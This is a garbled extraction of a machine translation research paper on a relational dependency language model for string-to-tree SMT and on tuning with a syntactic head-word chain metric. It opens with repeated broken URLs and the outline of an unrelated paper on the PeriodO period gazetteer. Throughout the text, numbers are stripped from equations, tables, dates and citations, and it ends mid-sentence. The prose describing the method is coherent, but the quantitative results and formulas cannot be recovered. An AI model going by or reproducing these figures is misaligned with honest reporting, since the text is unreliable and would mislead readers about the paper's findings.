http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dx.doi.org/ . /s - - - http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://www.w .org/tr/ /rec-json-ld- / http://dx.doi.org/ . /jeslib. . http://dx.doi.org/ . /peerj-cs. nanopublication beyond the sciences: the periodo period gazetteer introduction nanopublications nanopublication in the humanities the periodo period gazetteer data model periodo as linked data rdf vocabularies modeling provenance minting long-term urls period assertions as nanopublications the unfalsifiable nature of time period definitions the critical role of curation project status and future work conclusion references modelling and optimizing on syntactic n-grams for statistical machine translation rico sennrich school of informatics university of edinburgh crichton street edinburgh eh ab scotland, uk abstract the role of language models in smt is to promote fluent translation output, but tradi- tional n-gram language models are unable to capture fluency phenomena between distant words, such as some morphological agree- ment phenomena, subcategorisation, and syn- tactic collocations with string-level gaps. syn- tactic language models have the potential to fill this modelling gap. we propose a lan- guage model for dependency structures that is relational rather than configurational and thus particularly suited for languages with a (rel- atively) free word order. it is trainable with neural networks, and not only improves over standard n-gram language models, but also outperforms related syntactic language mod- els. we empirically demonstrate its effective- ness in terms of perplexity and as a feature function in string-to-tree smt from english to german and russian. we also show that using a syntactic evaluation metric to tune the log-linear parameters of an smt system fur- ther increases translation quality when cou- pled with a syntactic language model. introduction many languages exhibit fluency phenomena that are discontinuous in the surface string, and are thus not modelled well by traditional n-gram language mod- els. examples include morphological agreement, e.g. subject-verb agreement in languages that do not (exclusively) follow svo word order, subcategori- sation, and collocations involving distant, but syn- tactically linked words. syntactic language models try to overcome the limitation to a local n-gram context by using syn- tactically related words (and non-terminals) as con- text information. despite their theoretical attractive- ness, it has proven difficult to improve smt with parsers as language models (och et al., ; post and gildea, ). this paper describes an effective method to model, train, decode with, and weight a syntactic language model for smt. while all these aspects are important for successfully applying a syntactic lan- guage model, our primary contributions are a novel dependency language model which improves over prior work by making relational modelling assump- tions, which we argue are better suited for languages with a (relatively) free word order, and the use of a syntactic evaluation metric for optimizing the log- linear parameters of the smt model. while language models that operate on words linked through a dependency chain – called syntactic n-grams (sidorov et al., ) – can improve trans- lation, some of the improvement is invisible to an n-gram metric such as bleu. as a result, tuning to bleu does not show the full value of a syntactic language model. what does show its value is an op- timization metric that operates on the same syntactic n-grams that are modelled by the dependency lm. the paper is structured as follows. section de- scribes our relational dependency language model; section describes our neural network training pro- cedure, and the integration of the model into an smt decoder. we describe the syntactic evaluation metric we use for tuning in section . the language mod- els are evaluated on the basis of perplexity and smt transactions of the association for computational linguistics, vol. , pp. – , . action editor: philipp koehn. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. performance in section . we discuss related work in section , and finish with concluding remarks in section . a relational dependency language model as motivation, and working example for the model description, consider the dependency tree in figure , which is taken from the output of our baseline string-to-tree smt system. the output contains two errors: • a morphological agreement error between the subject ergebnisse (plural) and the finite verb wird (singular). • a subcategorisation error: überraschen is tran- sitive, but the translation has a prepositional phrase instead of an object. while these errors might not have occurred if the words involved were adjacent to one another here and throughout the training set, non-adjacency is common, especially where the distance between subject and finite verb, or between a full verb and its arguments can be arbitrarily long. prior work on syntactic language modelling has typically focused on english, and we argue that some modelling decisions do not transfer well to other languages. the dependency models proposed by shen et al. ( ) and zhang ( ) rely heav- ily on structural information such as the direction and distance of the dependent from the parent. in a language where the order of syntactic dependents is more flexible than in english, such as german , grammatical function (and thus the inflection) is hard to predict from the dependent order. instead, we make dependency labels, which encode gram- matical relations, a core element of our model. the tree is converted into constituency format for compati- bility with scfg decoding algorithms, with dependency edges represented as non-terminal nodes. german has a strict word order within noun phrases and for the placement of verbs, but has different word order for main clauses and subordinated clauses, and some flexibility in the order of dependents of a verb. tsarfaty ( ) classifies parsing approaches into config- urational approaches that rely on structural information, and relational ones that take grammatical relations as primitives. while she uses dependency syntax as a prototypical example of shen et al. ( ) propose a model that estimates probability of each token given its parent and/or pre- ceding siblings. we start with a variant of their model that does not hard-code configurational mod- elling assumptions, and then extend it by including dependency labels. . unlabelled model let s be a sequence of terminal symbols w ,w , ...,wn with a dependency topology t , and let hs(i) and ha(i) be lists of heads of preceding siblings and ancestors of wi according to t , from closest to furthest. in our example in figure : • w = jüngsten • hs( ) = (der) • ha( ) = (umfrage, ergebnisse, wird,�) note that ha and its subsequences are instances of syntactic n-grams. for this model, we follow re- lated work and assume that t is available (popel and marecek, ), approximating p(s) as p(s|t). we make the markov assumption that the probabil- ity of each word only depends on its preceding sib- lings and ancestors, and decompose the probability of a sentence like this: p(s) = p(w ,w , ...,wn) ≈ n∏ i= p(wi|hs(i),ha(i)) ( ) we further make the markov assumption that only a fixed window of the closest q siblings, and the clos- est r ancestors, affect the probability of a word. p(s) ≈ n∏ i= p(wi|hs(i)q ,ha(i) r ) ( ) equation represents our basic, unlabelled model. it differs from that of shen et al. ( ) in two ways. relational approaches, the dependency lm by shen et al. ( ) would fall into the configurational category, while ours is rela- tional. shen et al. ( ) use the siblings that are between the word and its parent, i.e. the following siblings if the word comes be- fore its parent. we believe both preceding and following sib- lings are potentially useful, but leave expansion of the context to future work. die ergebnisse der jüngsten umfrage wird für viele überraschen . root root det subj det attr gmod pp pn aux .manytosurpriseaascomewillpollrecenttheofconclusionsthe sent punct $. . vroot aux vvinf überraschen pp pn pis viele appr für vafin wird subj gmod nn umfrage attr adja jüngsten det art der nn ergebnisse det art die figure : translation output of baseline english→german string-to-tree smt system with original dependency rep- resentation and conversion into constituency representation. first, it uses separate context windows for siblings and ancestors. in contrast, shen et al. ( ) treat the ancestor as the first symbol in a context window that is shared between the ancestor and siblings. our formulation encodes our belief that the model should always assume dependence on the r nearest ancestor nodes, regardless of the number of siblings. sec- ondly, shen et al. ( ) separate dependents to the left and to the right of the parent. while the fixed svo verb order in english is compatible with such a separation, allowing pl to model subjects, pr to model objects, most arguments can occur before or after the head verb in german main clauses. we thus argue that left and right dependents should be mod- elled by a single model to allow for sharing of sta- tistical strength. . labelled model the motivation for the inclusion of dependency la- bels is twofold. firstly, having dependency labels in the context serves as a strong signal for the pre- diction of the correct inflectional form. secondly, dependency labels are the appropriate level of ab- similar arguments have been made for parsing of (rela- tively) free word-order languages, e.g. by tsarfaty et al. ( ). straction to model subcategorisation frames. let d be a sequence of dependency labels l , l , ..., ln, with each label li being the label of the incoming arc at position i in t , and ls(i) and la(i) the list of dependency labels of the siblings and an- cestors of wi, respectively. continuing the example for w , these are: • l = attr • ls( ) = (det) • la( ) = (gmod, subj, vroot, sent) we predict both the terminal symbols s and de- pendency labels d. the latter lets us model sub- categorisation by penalizing unlikely relations, e.g. objects whose parent is an intransitive verb. we de- compose p(s,d) into p(d)×p(s|d) to obtain: p(s,d) = p(d)×p(s|d) ≈ n∏ i= pl(i)×pw(i) pl(i) =p(li|hs(i)q , ls(i) q ,ha(i) r , la(i) r ) pw(i) =p(wi|hs(i)q , ls(i) q ,ha(i) r , la(i) r , li) ( ) . head and label extraction we here discuss some details for the extraction of the context hs and ha. dependency structures re- quire no language-specific head extraction rules, even in a converted constituency representation. in the constituency representation shown in figure , each non-terminal node in the tree that is not a pre- terminal has exactly one pre-terminal child. the head of a non-terminal node can thus be extracted by identifying the pre-terminal child, and taking its terminal symbol as head. an exception is the virtual node sent, which is added to the root of the tree to combine subtrees that are not connected in the orig- inal grammar, e.g. the main tree and the punctuation symbol. if a node has no pre-terminal child, we use a special token � as its head. if the sibling of a node is a pre-terminal node, we represent this through a special token in hs and ls. we also use special out-of-bound tokens (separate for hs, ha, ls and la) to fill up the context window if the window is larger than the number of siblings and/or ancestors. the context extraction rules are language- independent and can be applied to any dependency structure. language-specific or grammar-specific rules are possible in principle. for instance, for ver- bal heads in german, one could consider separable verb prefixes part of the head, and thus model differ- ences in subcategorisation between schlagen (engl. beat) and schlagen ... vor (engl. suggest). . predicting the tree topology the model in equation still assumes the topology of the dependency tree to be given, and we remedy this by also predicting pre-terminal nodes, and a vir- tual stop node as the last child of each node. this models the position of the head in a subtree (through the prediction of pre-terminal nodes), and the prob- ability that a word has no more dependents (by as- signing probability mass to the stop node). instead of generating all n terminal symbols as in equation , we generate all m nodes in the de- pendency tree in top-down, depth-first order, with li being pt for pre-terminals, and the node label oth- erwise, and wi being either the head of the node, or � if the node has no pre-terminal child. our final model is given in equation . n d det attr gmod s der jüngsten umfrage t n d gmod det pt stop attr pt stop pt stop s umfrage der � � jüngsten � � � � t figure : snippet of prediction steps when generating ter- minals (top) or all nodes in tree (bottom) for dependency tree in figure . p(s,d,t) ≈ m∏ i= { pl(i)×pw(i), if wi = � pl(i), otherwise ( ) figure illustrates the prediction of a subtree of the dependency tree in figure . note that t is encoded implicitly, and can be retrieved from d through a stack to which all nodes (except for pre- terminal and stop nodes) are pushed after predic- tion, and from which the last node is popped when predicting a stop node. neural network training and smt decoding we extract all training instances from automatically parsed training text, and perform training with a standard feed-forward neural network (bengio et al., ), using the nplm toolkit (vaswani et al., ). back-off smoothing schemes are unsatisfac- tory because it is unclear which part of the context should be forgotten first, and neural networks ele- gantly solve this problem. we use two separate net- works, one for pw and one for pl. both networks share the same input vocabulary, but are trained and applied independently. the model input is a ( q + r)-word context vector (+ for pw to encode li), each word being mapped to a shared embedding layer. we use a single hidden layer with rectified- linear activation function, and noise-contrastive es- timation (nce). we integrate our dependency language models into a string-to-tree smt system as additional fea- ture functions that score each translation hypothe- sis. the model in equation predicts p(s,d,t). model input input entropy rate -gram -gram a b c d e . bigram bigram d e . -gram bigram � � � d e . table : handling unavailable input words by replacing them with null words. obtaining the probability of the translation hypoth- esis p(s) would require the (costly) marginaliza- tion over all sequences of dependency labels d and topologies t , but like the smt decoder itself, we approximate the search for the best translation by searching for the highest-scoring derivation, mean- ing that we directly integrate pw and pl as two fea- tures into the log-linear smt model. we use self- normalized neural networks with precomputation of the hidden layer, which makes the integration into decoding reasonably fast. the decoder builds the translation bottom-up, and the full context is not available for all symbols in the hypothesis. vaswani et al. ( ) propose to use a special null word for unavailable context, their em- bedding being the weighted average of the input em- beddings of all other words. we adopt this strategy, with the difference that we use separate null words for each position in the context window in order to reflect distributional differences between the differ- ent positions, e.g. between ancestor labels and sib- ling labels. symbols are re-scored as more context becomes available in decoding, but poor approxima- tions could affect pruning and thus lead to search errors. in table , we illustrate the use of null words with a -gram and a bigram nnlm model. we ob- serve a small increase in entropy when querying the -gram model with bigrams, compared to querying a bigram model directly. some hierarchical smt systems allow glue rules which concatenate two subtrees. since the resulting glue structures do not occur in the training data, we do not estimate their probability in our model. when encountering the root of a glue rule in our language model, we recursively evaluate its children, but ig- nore the glue node itself. this could introduce a bias towards using more glue rules during transla- tion. to counter this, and encourage the production of linguistically plausible trees, we assign a fixed, high cost to glue rules. glue rules thus play a small role in our systems, with about glue rule appli- cations per sentences, and could be abandoned entirely. optimizing syntactic n-grams n-gram based metrics such as bleu (papineni et al., ) are still predominantly used to optimize the log-linear parameters of smt systems, and (to a lesser extent) to evaluate the final translation sys- tems. however, n-gram metrics are not well suited to measure fluency phenomena with string-level gaps, and there is a danger that bleu underesti- mates the modelling power of dependency language models, resulting in a suboptimal assignment of log- linear weights. as an alternative metric that operates on the level of syntactic n-grams, we use a variant of the head-word chain metric (hwcm) (liu and gildea, ). hwcm is a precision metric similar to bleu, but instead of counting n-gram matches between the translation output and the reference, it compares head-word chains, or syntactic n-grams. hwcm is not only suitable for our task because it operates on the same structures as the dependency language models, but also because our string-to-tree smt ar- chitecture produces trees that can be evaluated di- rectly, without requiring a separate parse of the translation output, a task for which few parsers are optimized. for extracting syntactic n-grams from the reference translations of the respective develop- ment and test sets, we automatically parse them, us- ing the same preprocessing as for training. we count syntactic n-grams of sizes to , mirror- ing the typical usage of bleu. banerjee and lavie ( ) have demonstrated the importance of recall in mt evaluation, and we compute the harmonic mean of precision and recall, which we denote hwcmf , instead of the original, precision-based metric. evaluation we perform three evaluations of our dependency language models. our perplexity evaluation mea- sures model perplexity on the -best output of a for efficiency reasons, our experimental systems only per- form scfg parsing for spans of up to words, and use glue rules to concatenate partial derivations in longer sentences. bet- ter decoding algorithms have reduced the need for this limit (sennrich, ). baseline smt system and a human reference trans- lation. our smt evaluation integrates the model as a feature function in a string-to-tree smt system and evaluates its impact on translation quality. finally, we quantify the effect of different language mod- els on grammaticality by measuring the number of agreement errors of our smt systems. we refer to the unlabelled variant of our model (equation ) as dlm, and to the labelled variant (equation ) as rdlm, emphasizing that the latter is a relational dependency lm. . data and methods we perform our experiments on english→german data from the wmt shared translation task (bojar et al., ), consisting of about . million sentence pairs of parallel data and million sen- tences of monolingual german data. we train all language models on the german side of the par- allel text and the monolingual data. we also per- form some experiments on the english→russian data from the same translation task, with million sentence pairs of parallel data and million sen- tences of monolingual russian data. for a -gram neural network lm baseline (nnlm), and the dependency language models, we train feed-forward neural network language models with the nplm toolkit. we use dimensions for the input embeddings, and a single hidden layer with dimensions. we use a vocabulary of words ( for the output vocabulary of pl), from which we draw noise samples for nce ( for pl). we train for two epochs, each epoch being a full traversal of the training text. for unknown words, we back-off to a special unk token for the sequence models and pl, and to the pre-terminal symbol for the other dependency models. we report perplex- ity values with softmax normalization, but disable normalization during decoding, relying on the self- normalization of nce for efficiency. for the transla- tion experiments with dlm and rdlm, we set the sibling window size q to , and the ancestor window size r to . we train baseline language models with interpo- lated modified kneser-ney smoothing with srilm on our test set, a node has an average of . ancestors (σ = . ), and . left siblings (σ = . ). (stolcke, ). the model in the smt baseline uses the full vocabulary and a linear interpolation of component models for domain adaptation. for the perplexity evaluation, we use the same vocabulary and training data as for the neural network models. for the english→german smt evaluation, our baseline system is a string-to-tree smt system with moses (koehn et al., ), with dependency pars- ing of the german texts (sennrich et al., ). it is described in more detail in (williams et al., ). this setup was ranked – (out of ) in the wmt shared translation task and is state- of-the art. our biggest deviation from this setup is that we do not enforce the morphological agree- ment constraints that are provided by a unification grammar (williams and koehn, ), but use them for analysis instead. for english→russian, we copy the language-independent settings from the the english→german set-up, and perform dependency parsing with a russian model for the maltparser (nivre et al., ; sharoff and nivre, ), ap- plying projectivization after parsing. we tune our system on a development set of sentences with k-best batch mira (cherry and fos- ter, ) on bleu and a linear interpolation of bleu and hwcmf , and report both scores for eval- uation. we also report meteor (denkowski and lavie, ) for german and ter (snover et al., ). we control for optimizer instability by run- ning the optimization three times per system and performing significance testing with multeval (clark et al., ), which we enhanced to also perform sig- nificance testing for hwcmf . . implementation notes on model by shen et al. ( ) we reimplement the model by shen et al. ( ) for our evaluation. the authors did not specify training and smoothing of their model, so we only adopt their definition of the context window, and use the same neural network architecture as for our other models. specifically, we use two neural networks: one for left dependents, and one for right dependents. we use maximum-likelihood estimation for the head of root nodes, ignoring unseen events. to distinguish between parents and siblings in the context window, we double the input vocabulary and mark parents with a suffix. like shen et al. ( ), we ignore the language model perplexity entropy ref. -best difference -gram (kn) . . - . % -gram nnlm . . . % shen et al. ( ) . . . % dlm (q= ; r= ) . . . % dlm (q= ; r= ) . . . % rdlm (q= ; r= ) . . . % rdlm, pw . . . % rdlm, pl . . . % table : perplexity of different neural network language models (and baseline with kneser-ney smoothing) on german reference translation (newstest ) and base- line english→german translation output. our goal is a language model that prefers the reference over the trans- lation hypothesis, indicated by a lower perplexity and a positive entropy difference. prediction of stop labels, meaning that our imple- mentation assumes the dependency topology to be given. we use a trigram model like the original au- thors. peter et al. ( ) experiment with higher or- ders variants, but do not consider grandparent nodes. we consider scalability to a larger ancestor context a real concern, since another duplication of the vo- cabulary may be necessary for each ancestor level. . perplexity there are a number of factors that make a direct comparison of the reference set perplexity unfair. mainly, the unlabelled dependency model dlm and the one by shen et al. ( ) assume that the de- pendency topology is given; pw even assumes this for the dependency labels d. conversely, the full rdlm predicts the terminal sequence, the depen- dency labels, and the dependency topology, and we thus expect it to have a higher perplexity. also note that we compare -gram n-gram models to - and - gram dependency models. a more minor difference is that n-gram models also predict end-of-sentence tokens, which the dependency models do not. rather than directly comparing perplexity be- tween different models, our focus lies on a perplex- ity comparison between a human reference transla- tion and the -best smt output of a baseline transla- for better comparability, we measure perplexity per surface word, not per prediction. tion system. our basic assumption is that the differ- ence in perplexity (or cross-entropy) tells us whether a model contains information that is not already part of the baseline model, and if incorporating it into our smt system can nudge the system towards produc- ing a translation that is more similar to the reference. results for english→german are shown in ta- ble . the baseline -gram language model with kneser-ney smoothing prefers the smt output over the reference translation, which is natural given that this language model is part of the system producing the smt output. the -gram nnlm improves over the kneser-ney models, and happens to assign al- most the same perplexity score to both texts. this still means that it is less biased towards the smt output than the baseline model, and can be a valu- able addition to the model. the dependency language models all show a pref- erence for the reference translation, with dlm hav- ing a stronger preference than the model by shen et al. ( ), and rdlm having the strongest prefer- ence. the direct comparison of dlm and pw, which is the component of rdlm that predicts the termi- nal symbols, shows that dependency labels serve as a strong signal for predicting the terminals, confirm- ing our initial hypothesis. the prediction of the de- pendency topology and labels through pl means that the full rdlm has the highest perplexity of all mod- els. however, it also strongly prefers the human ref- erence text over the baseline smt output. . translation quality translation results for english→german with dif- ferent language models added to our baseline are shown in table . considering the systems tuned on bleu, we observe that the -gram nnlm and rdlm are best in terms of bleu and ter, but that rdlm is the only winner according to hwcmf and meteor. in particular, we observe a sizable gap of . hwcmf points between the nnlm and the rdlm systems, despite similar bleu scores. the unlabelled dlm and the dependency lm by shen et al. ( ), which are generally weaker than rdlm, also tend to improve hwcmf more than bleu. this reflects the fact that the dependency we denote a system a winner if no other system [in the group of systems under consideration] is significantly better ac- cording to significance testing with multeval. mira system dev newstest newstest objective bleu hwcmf meteor ter bleu hwcmf meteor ter bleu hwcmf meteor ter bleu baseline . . . . . . . * . . . . * . -gram nnlm . . . * . . . . . . . . * . shen et al. ( ) . * . . * . . . . * . . . . * . dlm . * . . * . . . . * . . . . * . rdlm . . . * . . . . * . . . . * . -gram + rdlm . . . * . . . . * . . . . * . bleu + hwcmf baseline . . * . . * . * . * . . * . * . * . . * -gram nnlm . . * . . * . * . * . . * . * . . . * shen et al. ( ) . . * . . * . * . * . . * . * . * . . * dlm . . * . . * . . * . . * . * . * . . * rdlm . . * . . * . * . * . . * . * . * . . * -gram + rdlm . . * . . * . * . * . . * . * . * . . * table : translation quality of english→german string-to-tree smt system with different language models, with k- best batch mira optimization on bleu and bleu+hwcmf . average of optimization runs. bold: no other system in same block is significantly better (p < . ); *: significantly better than same model with other mira objective (p < . ). higher scores are better for bleu, hwcmf and meteor; lower scores are better for ter. lms improve fluency along the syntactic n-grams that hwcm measures, whereas nnlm only im- proves local fluency, to which bleu is most sen- sitive. the fact that the models cover different phe- nomena is also reflected in the fact that we see fur- ther gains from combining the -gram nnlm with the strongest dependency lm, rdlm, for a total im- provement of . – . bleu over the baseline. if we use bleu+hwcmf as our tuning objec- tive, the difference between the models increases. compared to the -gram nnlm, the rdlm system gains . – . points in hwcmf and . – . points in bleu. compared to the original baseline, tuned only on bleu, the system with rdlm that is tuned on bleu+hwcmf yields an improvement of . – . bleu and . – . hwcmf . if we compare the same system being trained on both tuning objectives, we observe that tuning on bleu+hwcmf , unsurprisingly, yields higher hwcmf scores than tuning on bleu only. what is more surprising is that adding hwcmf as a tun- ing objective also yields significantly higher bleu on the test sets for out of data points. the gap is larger for the two systems with rdlm ( . – . bleu) than for the baseline or the nnlm system ( . – . bleu). we hypothesize that the inclusion of hwcmf as a tuning metric reduces overfitting and encourages the production of more grammat- ically well-formed constructions, which we expect to be a robust objective across different texts, espe- cially when coupled with a strong dependency lan- guage model such as rdlm. some example translations are shown in table . they illustrate three error types in the baseline sys- tem: . an error in subject-verb agreement. . a subcategorisation error: gelten is a valid translation of the intransitive meaning of apply, but cannot be used for transitive constructions, where anwenden is correct. . a collocation error: two separate collocations are conflated in the baseline translation: • reach a decision on [...] eine entscheidung über [...] treffen • reach an agreement on [...] eine einigung über [...] erzielen all errors are due to inter-dependencies in the sen- tence that have string-level gaps, but which can be modelled through syntactic n-grams, and are cor- rected by the system with rdlm and tuning on bleu+hwcmf . we evaluate a subset of the systems on an english→russian task to test whether the im- provements from adding rdlm and tuning on bleu+hwcmf apply to other language pairs. re- sults are shown in table . the system with rdlm source also the user manages his identity and can therefore be anonymous. baseline auch der benutzer verwaltet seine identität und können daher anonym sein. best auch der benutzer verwaltet seine identität und kann daher anonym sein. reference darüber hinaus verwaltet der inhaber seine identität und kann somit anonym bleiben. source how do you apply this definition to their daily life and social networks? baseline wie kann man diese definition für ihr tägliches leben und soziale netzwerke gelten? best wie kann man diese definition auf ihren alltag und sozialen netzwerken anwenden? reference wie wird diese definition auf seinen alltag und die sozialen netzwerke angewendet? source the city council must reach a decision on this in december. baseline der stadtrat muss im dezember eine entscheidung darüber erzielen. best im dezember muss der stadtrat eine entscheidung darüber treffen. reference im dezember muss dann noch die stadtverordnetenversammlung entscheiden. table : smt output of baseline system and best system (rdlm tuned on bleu+hwcmf ). mira system dev newstest newstest objective bleu hwcmf ter bleu hwcmf ter bleu hwcmf ter bleu baseline . . . . . . . . . dlm . * . . . . . . . . rdlm . . . . . . . . . bleu+ hwcmf baseline . . * . * . . * . * . . * . * dlm . . * . * . . * . * . . * . * rdlm . . * . * . . * . * . * . * . * table : translation quality of english→russian string-to-tree smt system with dlm and rdlm, with k-best batch mira optimization on bleu and bleu+hwcmf . average of optimization runs. bold: no other system in same block is significantly better (p < . ); *: significantly better than same model with other mira objective (p < . ). higher scores are better for bleu and hwcmf ; lower scores are better for ter. is the consistent winner, and significantly outper- forms the baseline for all metrics and test sets. tun- ing on bleu+hwcmf results in further improve- ments in hwcmf and ter. looking at the com- bined effect of adding rdlm and changing the tun- ing objective, we observe gains in bleu by . – . points, and gains in hwcmf by . – . points. . morphological agreement we argue that the dependency language models and hwcmf as a tuning metric improve grammatical- ity, and we are able to quantify one aspect thereof, morphological agreement, for english→german. williams and koehn ( ) introduce a unification grammar with hand-crafted agreement constraints to identify and suppress selected morphological agree- ment violations in german, namely in regards to noun phrase agreement, prepositional phrase agree- ment, and subject-verb agreement. we can use their grammar to analyse the effect of different models on morphological agreement by counting the number of translations that violate at least one agreement con- straint. we assume that the number of false posi- system mira objective bleu bleu+hwcmf baseline -gram nnlm shen et al. ( ) dlm rdlm -gram + rdlm table : number of english→german translation hy- potheses with at least one agreement error according to unification grammar (williams and koehn, ) on newstest ( sentences). average of three mira runs. tives (i.e. correct analyses that trigger an agreement violation) remains roughly constant throughout all systems, so that a reduction in the number of agree- ment violations is an indicator of better grammatical agreement. table shows the results. while the -gram nnlm reduces the number of agreement errors somewhat compared to the baseline (- %), the reduction is greater for dlm (- %) and rdlm (- %). neither the baseline nor the -gram nnlm profits strongly from tuning on hwcmf , while the number of agreement errors is further reduced for the system with dlm (- %) and rdlm (- %). adding the -gram nnlm to the rdlm system yields no further reduction on the number of agree- ment errors. enforcing the agreement constraints on the base- line system (tuned on bleu+hwcmf ) provides us with a gain of . in both bleu and hwcmf ; on the rdlm system, only . . the fact that the ben- efit of enforcing the agreement constraints drops off more sharply than the number of constraint viola- tions indicates that the remaining violations tend to be harder for the model to correct, e.g. because the translation model has not learned to produce the re- quired inflection of a word, or because some of the remaining violations are false positives. while the dependency language models’ effect of improving morphological agreement is not (fully) cumulative with the benefit from enforcing the unification con- straints formulated by williams and koehn ( ), our model has the advantage of being language- independent, learning from the data itself rather than relying on manually developed, grammar-specific constraints, and covering a wider range of phenom- ena such as subcategorisation and syntactic colloca- tions. the results confirm that the rdlm is more ef- fective at reducing morphological agreement errors than a similarly trained n-gram nnlm and the unla- belled dlm, and that adding hwcmf to the train- ing objective is beneficial. on a a meta-evaluation level, we compare the rank correlation between the automatic metrics and the numer of agreement er- rors with kendall’s τ correlation, and observe that he number of agreement errors is more strongly (nega- tively) correlated with hwcmf (τ = − . ) than with bleu (τ = − . ), meteor (τ = − . ) or ter (τ = . ). this supports our theoretical expectation that hwcmf is more sensitive to mor- phological agreement, which is enforced along syn- tactic n-grams, than n-gram metrics such as bleu, or the unigram metric meteor. related work while there has been a wide range of dependency language models proposed (e.g. (chelba et al., ; quirk et al., ; shen et al., ; zhang, ; popel and marecek, )), there are vast differ- ences in modelling assumptions. our work is most similar to the dependency language model described in shen et al. ( ), or the h-gram model proposed by zhang ( ), both of which have been used for smt. we make different modelling assumptions, relying less on configurational information, but in- cluding the prediction of dependency labels in the model. we argue that our relational modelling as- sumptions are more suitable for languages with a relatively free word order such as german. to a lesser extent, our work is similar to other parsing models that have been used for language modelling, such as lexicalized pcfgs (charniak, ; collins, ; charniak et al., ), or struc- tured language models (chelba and jelinek, ); previous efforts to include them in the translation process failed to improve translation performance (och et al., ; post and gildea, ). differ- ences in our work that could explain why we see im- provements include the use of neural networks for training the model on the automatically parsed train- ing text, instead of re-using existing parser mod- els, which could be seen as a form of self-training (mcclosky et al., ), and the integration of the language model into the decoder instead of n-best reranking. also, there are major differences in the parsing models themselves. for instance, note that the structured lm by chelba and jelinek ( ) uses a binary branching structure, and that complex label sets would be required to encode subcategorisation frames in binary trees (hockenmaier and steedman, ). our neural network is a standard feed-forward neural network as introduced by bengio et al. ( ). recently, recursive neural networks have been proposed for syntactic parsing (socher et al., ; le and zuidema, ). the recursive na- ture of such models allows for the encoding of more context; for an efficient integration into the dynamic programming search of smt decoding, we deem our model, which makes stronger markov assump- tions, more suitable. while bleu has been the standard objective func- tion for tuning the log-linear parameters in smt sys- tems, recent work has investigated alternative objec- tive functions. some authors concluded that none of the tested alternatives could consistently outperform bleu (cer et al., ; callison-burch et al., ). liu et al. ( ) report that tuning on the tesla metric gives better results than tuning on bleu; lo et al. ( ) do the same for meant. there is related work on improving morpholog- ical agreement and subcategorisation through post- editing (rosa et al., ) or independent models for inflection generation (toutanova et al., ; weller et al., ). the latter models initially pro- duce a stemmed translation, then predict the inflec- tion through feature-rich sequence models. such a pipeline of prediction steps is less powerful than our joint prediction of stems and inflection. for in- stance, in example in table , our model chooses a different stem to match the subcategorisation frame of the translation; it is not possible to fix the baseline translation with inflection changes alone. conclusion the main contribution of this paper is the description of a relational dependency language model. we show that it is a valuable asset to a state-of-the-art smt system by comparing perplexity values with other types of languages models, and by its integra- tion into decoding, which results in improvements according to automatic mt metrics and reduces the number of agreement errors. we show that the dis- fluencies that our model captures are qualitatively different from an n-gram neural network language model, with our model being more effective at mod- elling fluency phenomena along syntactic n-grams. a second important contribution is the optimiza- tion of the log-linear parameters of an smt sys- tem based on syntactic n-grams. we are to our knowledge the first to tune an smt system on a non-shallow syntactic similarity metric. apart from showing improvements by tuning on hwcmf , our results also shed light on the interaction between models and tuning metrics. with n-gram language models, the choice of tuning metric only had a small effect on the english→german translation results. only with dependency language models, which are able to model the syntactic n-grams that hwcm scores, did we see large improvements from adding we have released an implementation of rdlm and tuning on hwcmf as part of the moses decoder. hwcmf to the objective function. on the one hand, this has implications when evaluating new model components: using an objective function that can- not capture the impact of a model component can result in false negatives because the model compo- nent will not receive an appropriate weight, and the model may thus seem to be of little use, even in a human evaluation. on the other hand, it is an im- portant finding for the evaluation of objective func- tions: the performance of an objective function is tied to the power of the underlying model. without a model that is able to model syntactic n-grams, we might have concluded that hwcm is of little help as an objective function. now, we hypothesize that hwcm is well-suited to optimize dependency lan- guage models because both operate on syntactic n- grams, just 